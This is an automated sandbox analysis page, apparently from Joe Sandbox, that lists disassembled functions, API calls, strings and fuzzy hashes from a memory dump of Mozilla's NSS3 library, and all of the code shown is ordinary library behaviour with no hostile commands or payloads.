Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 01e3841c7f49ef58c807525edf8880fa790d19b8962df8836ac75a330059979e
Instruction ID: f9e8a63d4730f653249ac372f1a8120658c9fe8371640388e27470bfc8c6c592
Opcode Fuzzy Hash: 01e3841c7f49ef58c807525edf8880fa790d19b8962df8836ac75a330059979e
Instruction Fuzzy Hash: A641B9B5B002059BEB016F78ED44A6A77B8EF16358F094170EC1897B12FB31D9A8C7D2

Function 6CAABFF0 Relevance: 15.1, APIs: 10, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CAABFFB

Part of subcall function 6CB00FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAA87ED,00000800,6CA9EF74,00000000), ref: 6CB01000
Part of subcall function 6CB00FF0: PR_NewLock.NSS3(?,00000800,6CA9EF74,00000000), ref: 6CB01016
Part of subcall function 6CB00FF0: PL_InitArenaPool.NSS3(00000000,security,6CAA87ED,00000008,?,00000800,6CA9EF74,00000000), ref: 6CB0102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000018C), ref: 6CAAC015

Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB010F3
Part of subcall function 6CB010C0: EnterCriticalSection.KERNEL32(?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0110C
Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01141
Part of subcall function 6CB010C0: PR_Unlock.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01182
Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0119C

memset.VCRUNTIME140(-00000004,00000000,00000188), ref: 6CAAC032
DER_SetUInteger.NSS3(00000000,00000078,00000000), ref: 6CAAC04D

Part of subcall function 6CAF69E0: PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CAF6A47
Part of subcall function 6CAF69E0: memcpy.VCRUNTIME140(00000000,-00000005,00000001), ref: 6CAF6A64

DER_SetUInteger.NSS3(00000000,00000084,?), ref: 6CAAC064
CERT_CopyName.NSS3(00000000,000000A8,?), ref: 6CAAC07B

Part of subcall function 6CAA8980: PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6CAA7310), ref: 6CAA89B8
Part of subcall function 6CAA8980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6CAA7310), ref: 6CAA89E6
Part of subcall function 6CAA8980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6CAA8A00
Part of subcall function 6CAA8980: CERT_CopyRDN.NSS3(00000004,00000000,6CAA7310,?,?,00000004,?), ref: 6CAA8A1B
Part of subcall function 6CAA8980: PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6CAA8A74

Part of subcall function 6CAA1D10: PORT_FreeArena_Util.NSS3(000000B0,00000000,00000000,00000000,00000000,?,6CAAC097,00000000,000000B0,?), ref: 6CAA1D2C
Part of subcall function 6CAA1D10: SECITEM_CopyItem_Util.NSS3(000000B0,00000004,6CAAC09B,00000000,00000000,00000000,?,6CAAC097,00000000,000000B0,?), ref: 6CAA1D3F
Part of subcall function 6CAA1D10: SECITEM_CopyItem_Util.NSS3(000000B0,-00000010,6CAAC087,00000000,000000B0,?), ref: 6CAA1D54

CERT_CopyName.NSS3(00000000,000000CC,?), ref: 6CAAC0AD
SECKEY_CopySubjectPublicKeyInfo.NSS3(00000000,-000000D4,?), ref: 6CAAC0C9

Part of subcall function 6CAB2DD0: SECOID_CopyAlgorithmID_Util.NSS3(-000000D4,-00000004,6CAAC0D2,6CAAC0CE,00000000,-000000D4,?), ref: 6CAB2DF5
Part of subcall function 6CAB2DD0: SECITEM_CopyItem_Util.NSS3(-000000D4,-0000001C,?,?,?,?,6CAAC0CE,00000000,-000000D4,?), ref: 6CAB2E27

CERT_DestroyCertificate.NSS3(00000000), ref: 6CAAC0D6
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAAC0E3

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Copy$Arena$Alloc_Arena_$FreeItem_$IntegerNameValue$AlgorithmAllocateCertificateCriticalDestroyEnterGrow_InfoInitLockPoolPublicSectionSubjectUnlockcallocmemcpymemset
String ID:
API String ID: 3955726912-0
Opcode ID: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
Instruction ID: f487cf12ee10243835970b43a01109d1b6b20f2b6084381bbb1dbd191c8eefb5
Opcode Fuzzy Hash: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
Instruction Fuzzy Hash: C02192B2A402056BFB015AA2AD81FFB366C9B4175CF0C0035FD04DB646FB26D95E83B2

Function 6CAA2E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CAA2CDA,?,00000000), ref: 6CAA2E1E

Part of subcall function 6CAFFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CAA9003,?), ref: 6CAFFD91
Part of subcall function 6CAFFD80: PORT_Alloc_Util.NSS3(A4686CB0,?), ref: 6CAFFDA2
Part of subcall function 6CAFFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CB0,?,?), ref: 6CAFFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6CAA2E33

Part of subcall function 6CAFFD80: free.MOZGLUE(00000000,?,?), ref: 6CAFFDD1

TlsGetValue.KERNEL32 ref: 6CAA2E4E
EnterCriticalSection.KERNEL32(?), ref: 6CAA2E5E
PL_HashTableLookup.NSS3(?), ref: 6CAA2E71
PL_HashTableRemove.NSS3(?), ref: 6CAA2E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6CAA2E96
PR_Unlock.NSS3 ref: 6CAA2EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAA2EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAA2EC5

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: bb1e3433de433aef3d61c36bfcc01bb13c16e39c248e313f80e4ebaf95a73760
Instruction ID: ceb8f98170511f9dda53df7689db3329fa5e4cd0e40ad21896b7d6bd488ce098
Opcode Fuzzy Hash: bb1e3433de433aef3d61c36bfcc01bb13c16e39c248e313f80e4ebaf95a73760
Instruction Fuzzy Hash: 9E21D376A00100A7EF211B65AD09A9B3A79DB5235DF094124ED2C83B11F732C5EED6A1

Function 6CA8FC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CA8FD18
sqlite3_initialize.NSS3 ref: 6CA8FD5F
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CA8FD89
memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6CA8FD99
sqlite3_free.NSS3(00000000), ref: 6CA8FE3C
sqlite3_free.NSS3(?), ref: 6CA8FEE3
sqlite3_free.NSS3(?), ref: 6CA8FEEE

Strings

simple, xrefs: 6CA8FC79

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: sqlite3_free$sqlite3_initialize$memcpymemset
String ID: simple
API String ID: 1130978851-3246079234
Opcode ID: b049c3362ed27a02e8b4f5913c59e4ae175bb8a0797b4174cc7f6104517369ea
Instruction ID: 278c1d0efcd76931eaeae2460e411f5e73022a4d589095637035b4e11572b2d1
Opcode Fuzzy Hash: b049c3362ed27a02e8b4f5913c59e4ae175bb8a0797b4174cc7f6104517369ea
Instruction Fuzzy Hash: 0F9174B0A022068FDB04CF55CD80A6AF7B1FF85318F28C16DD9199B752E735E995CB60

Function 6CA95CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CA95EC9
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA95EED

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA95ED1
%s at line %d of [%.10s], xrefs: 6CA95EE0
unable to close due to unfinalized statements or unfinished backups, xrefs: 6CA95E64
misuse, xrefs: 6CA95EDB
API call with %s database connection pointer, xrefs: 6CA95EC3
invalid, xrefs: 6CA95EBE

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 632333372-1982981357
Opcode ID: e8b3c4793f9f9173108c53e5d5e2ced43a3636c6a8401cc2c7b123e6c2dfb26c
Instruction ID: f27bb1117c1baf36a09c50a6b2ee0e932b5d4fddeb95ded5181ae6c1feae4de3
Opcode Fuzzy Hash: e8b3c4793f9f9173108c53e5d5e2ced43a3636c6a8401cc2c7b123e6c2dfb26c
Instruction Fuzzy Hash: 4E81BE30B166119BEB19CF25C84BB6A73F0BF4131AF2D4368D8165BB61D731E886CB91

Function 6CA7DCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA7DDF9
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA7DE68
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA7DE97
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CA7DEB6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA7DF78

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA7DE52, 6CA7DE81
%s at line %d of [%.10s], xrefs: 6CA7DE61, 6CA7DE90
database corruption, xrefs: 6CA7DE5C, 6CA7DE8B

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1526119172-598938438
Opcode ID: cd90e8dc8d8ea1271792cf2ceecde64d5c4951122157df5d209f5062d0010e63
Instruction ID: b7a6da281c109b7b71e29a11083d4079ca3a28ffd1cb996e95e11744da3f83c8
Opcode Fuzzy Hash: cd90e8dc8d8ea1271792cf2ceecde64d5c4951122157df5d209f5062d0010e63
Instruction Fuzzy Hash: 0581C579B053409FD724CF25C980B6A77F1BF45318F19882DE89A8BB52E731E885C762

Function 6CA2CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CA2B999), ref: 6CA2CFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CA2B999), ref: 6CA2D02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6CA2B999), ref: 6CA2D041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CA2B999), ref: 6CB7972B

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA2CFDD, 6CA2D00E, 6CA2D022, 6CA2D033, 6CB79780
%s at line %d of [%.10s], xrefs: 6CA2CFEC, 6CA2D018, 6CA2D029, 6CA2D03F, 6CB7978B
database corruption, xrefs: 6CA2CFE7, 6CA2D013, 6CA2D028, 6CA2D039, 6CA2D03E, 6CB79786

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 95a3e02e21e457c99984fe5a2e24fd3f47ff0fef14bdfe51ac794e74cc8ead91
Instruction ID: a7a2046a8740310be254c606f8e942a4bddbb643402710f1b77f89e09f25a2dd
Opcode Fuzzy Hash: 95a3e02e21e457c99984fe5a2e24fd3f47ff0fef14bdfe51ac794e74cc8ead91
Instruction Fuzzy Hash: 80615C71A043608BD320CF29C840BA6B7F5EF55319F29816DE4459FB42D37AE847C7A1

Function 6CB2FFF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 192memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB35B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB35B56

PK11_FreeSymKey.NSS3(00000000), ref: 6CB30113
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB30130
PORT_Alloc_Util.NSS3(00000040), ref: 6CB3015D
memcpy.VCRUNTIME140(-00000042,?,?), ref: 6CB301AF
PR_SetError.NSS3(FFFFD056,00000000), ref: 6CB30202
free.MOZGLUE(?), ref: 6CB30224
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB30253

Strings

exporter, xrefs: 6CB300F7

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Error$Alloc_FreeIdentitiesK11_LayerUtilfreememcpy
String ID: exporter
API String ID: 712147604-111224270
Opcode ID: f06dbb3194340f9b4efaae1f1fdd99880c297bb203808a8f739ca8194b361162
Instruction ID: b985fef40c0c6c2a93f0d74908157c2fd36c0c0d5f8a9cd64d997600db6deb3a
Opcode Fuzzy Hash: f06dbb3194340f9b4efaae1f1fdd99880c297bb203808a8f739ca8194b361162
Instruction Fuzzy Hash: 4A61F371900BD99BEF118FA4EC00BEE77B6FF44308F145228F91E56661E731A958CB42

Function 6CB2EF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6CB4A4A1,?,00000000,?,00000001), ref: 6CB2EF6D

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

htonl.WSOCK32(00000000,?,6CB4A4A1,?,00000000,?,00000001), ref: 6CB2EFE4
htonl.WSOCK32(?,00000000,?,6CB4A4A1,?,00000000,?,00000001), ref: 6CB2EFF1
memcpy.VCRUNTIME140(?,?,6CB4A4A1,?,00000000,?,6CB4A4A1,?,00000000,?,00000001), ref: 6CB2F00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6CB4A4A1,?,00000000,?,00000001), ref: 6CB2F027

Strings

dtls13, xrefs: 6CB2EF33

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: 47b88366ac040a5a2005b0c7f67a9bfed77e07f55aebcf17652ec7d97edb583f
Instruction ID: abac0eeab75be88305dd23d3ab4e58a7809ddad4a7c3a4ac092045808ad0be20
Opcode Fuzzy Hash: 47b88366ac040a5a2005b0c7f67a9bfed77e07f55aebcf17652ec7d97edb583f
Instruction Fuzzy Hash: 7E31F371A002919BDB20DF39DC40BAEB7E4EF49348F158029E81CAB751E735E915CBE2

Function 6CAAAF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CAAAFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CBC9500,6CAA3F91), ref: 6CAAAFD2

Part of subcall function 6CAFB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBD18D0,?), ref: 6CAFB095

DER_GetInteger_Util.NSS3(?), ref: 6CAAB007

Part of subcall function 6CAF6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6CAA1666,?,6CAAB00C,?), ref: 6CAF6AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6CAAB02F
PR_CallOnce.NSS3(6CC02AA4,6CB012D0), ref: 6CAAB046
PL_FreeArenaPool.NSS3 ref: 6CAAB058
PL_FinishArenaPool.NSS3 ref: 6CAAB060

Strings

security, xrefs: 6CAAAFB8

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: 638f4053da0c37956a0c31466caf40679c19402dce08fa25eaffad5df2036c52
Instruction ID: eda28c6761bab1d873e14281343964c70cd4e0443c3e65a6af51071095bbaa47
Opcode Fuzzy Hash: 638f4053da0c37956a0c31466caf40679c19402dce08fa25eaffad5df2036c52
Instruction Fuzzy Hash: 6E31387050434497D7108F65E841BAA7BB4AF4632CF140718F9B49BBD1E732918AC797

Function 6CAA3E60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 6CAA40D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CAA3F7F,?,00000055,?,?,6CAA1666,?,?), ref: 6CAA40D9
Part of subcall function 6CAA40D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CAA1666,?,?), ref: 6CAA40FC
Part of subcall function 6CAA40D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CAA1666,?,?), ref: 6CAA4138

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAA3EC2
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CAA3ED6

Part of subcall function 6CAFB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBD18D0,?), ref: 6CAFB095

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CAA3EEE

Part of subcall function 6CAFFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAF8D2D,?,00000000,?), ref: 6CAFFB85
Part of subcall function 6CAFFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CAFFBB1

PR_CallOnce.NSS3(6CC02AA4,6CB012D0), ref: 6CAA3F02
PL_FreeArenaPool.NSS3 ref: 6CAA3F14
PL_FinishArenaPool.NSS3 ref: 6CAA3F1C

Part of subcall function 6CB064F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CB0127C,00000000,00000000,00000000), ref: 6CB0650E

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAA3F27

Strings

security, xrefs: 6CAA3EBC

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$ArenaItem_$Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_Zfreefreememcpy
String ID: security
API String ID: 1076417423-3315324353
Opcode ID: d79e1744022260287303304842598a0f09ad22f9853e312792970208ae9e5d9c
Instruction ID: 45ac9f27bc41bac324bb3f452fefde3ebeb6dfd824c84c0675366cc93dba8896
Opcode Fuzzy Hash: d79e1744022260287303304842598a0f09ad22f9853e312792970208ae9e5d9c
Instruction Fuzzy Hash: 1921F5B2A043406BD7149B55AC02FAF77B8AB4831CF04053DF999A7B81E731E6588796

Function 6CAECC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6CAECD08
PK11_DoesMechanism.NSS3(?,?), ref: 6CAECE16
PR_SetError.NSS3(00000000,00000000), ref: 6CAED079

